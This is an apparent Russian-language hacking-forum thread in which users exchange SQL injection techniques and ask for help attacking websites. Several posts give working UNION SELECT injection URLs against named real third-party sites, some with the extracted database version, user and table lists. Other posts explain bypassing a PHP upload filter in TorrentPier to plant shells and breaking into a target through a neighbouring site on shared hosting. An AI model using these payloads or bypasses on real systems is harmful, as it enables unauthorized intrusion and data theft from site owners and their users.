народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо
qez подстановка твоего вопроса не очень таки правильна если передать -1 параметру, который передается в запрос например SELECT username,password FROM users WHERE id=-1; с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )
ну да, такое тоже бывает, а вообще стандартизировать нельзя никак, кодеры все мыслят по своему, бог знает что они там пишут и что получается в конце, так что все зависит от ситуации
ну например тут http://felixonline.co.uk/print.php?article=-900 есть же ошибка, очень интересует исходный код етого запроса и ещо одно http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29,19,20%20%20from%20%20AnimTest%20%20where%201%20=%20%27 как вывести какуюнибуть инфу????
это ошибка не из за синтаксиса, просто запрос возвращает фелс, дальше фелс передается в функцию mysql_result(); и тот в свою очередь ругается
PHP: $this->attach_filename = str_replace('php', '_php_', $this->attach_filename); можно ли как-нибудь обойти? phtml не работает.
http://felixonline.co.uk/print.php?article=-900+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2+--+ 5.0.90-log:media_felix:media_felix@localhostc-linux-gnu Если не знаете, так не отвечайте.
str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp. Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором. Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.
Файлы с разным регистром заливает, но отдает их на скачивание. А если добавлять с тем же регистром расширение в allowlist, оно автоматом переводится в нижний. C htaccess не сработает, перед файлом рандомный текст добавляется. p.s. Движок TorrentPier
http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27 как вывести какуюнибуть инфу????
Запрос: Code: http://www.animeacademy.com/finalrevdisplay.php?id=-1'+union+select+1,group_concat(concat(table_schema,'.',table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_name+like+'%user%'+--+ Результат: Code: information_schema.USER_PRIVILEGES, animeacademy.attachmentcategoryuser, animeacademy.poll_user, animeacademy.user, animeacademy.useractivation, animeacademy.userban, animeacademy.userchangelog, animeacademy.usercss, animeacademy.usercsscache, animeacademy.userfield, animeacademy.usergroup, animeacademy.usergroupleader, animeacademy.usergrouprequest, animeacademy.userlist, animeacademy.usernote, animeacademy.userpromotion, animeacademy.usertextfield, animeacademy.usertitle, animeacademy2.poll_user
Почему когда например делаешь такой запрос: http://forum.antichat.ru/index.php?/\/\/\.ааауук То всё нормально открывается, и адрес остаётся таким же?!
о_0 А ты чего ждешь? После знака ? идут GET параметры, пересылаемые скрипту, но в твоем случае нет равенства, поэтому он вообще никак не реагирует. Если в скрипте была бы обработка таких данных, то как-нибудь бы и отреагировал скрипт. Прочитай RFC по HTTP протоколу, много нового узнаешь =\ http://localhost/version.php?blablabla PHP: <?php print_r($_REQUEST); ?> Code: Array ( [blablabla] => ) Вот если бы было к примеру условие: если в REQUEST входит blablabla то include('blablabla.php'); То да, что-то изменилось, но раз ничего такого нету, то данные никак не обрабатывается и не несут никаких изменений в логику работы скрипта.
Что не так?! http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29+from+information_schema.tables+where+table_schema=0x64623835303861--
У соседей 99% не будет никаком сервере рутовых прав о_0 Ломают через соседей так: нужен сайт1, пробили по ревип и там есть сайт2, похекали и залили шелл на сайт2 и там либо кривые права и есть доступ к сайт1, либо рутать, либо через сессии. А у тебя права не кривые, т.ч. либо рутай, либо через сессии если если доступ конечно, а он обычно есть. Не вижу смысла в этой теме рассказывать про то как поиметь через сессии, ищи по форуму. http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,unhex(hex(table_name))+from+information_schema.tables+where+table_schema=0x64623835303861--+
А разделитель (например ":") не надо, потому-что только одна таблица?! И как тогда дальше?! Как здесь другую кодировку сделать: http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_concat%28column_name+separator+0x3a%29+from+information_schema.columns+where+table_name=0x466171--+
http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_concat(unhex(hex(column_name))+separator+0x3a)+from+information_schema.columns+where+table_name=0x466171--+ не?
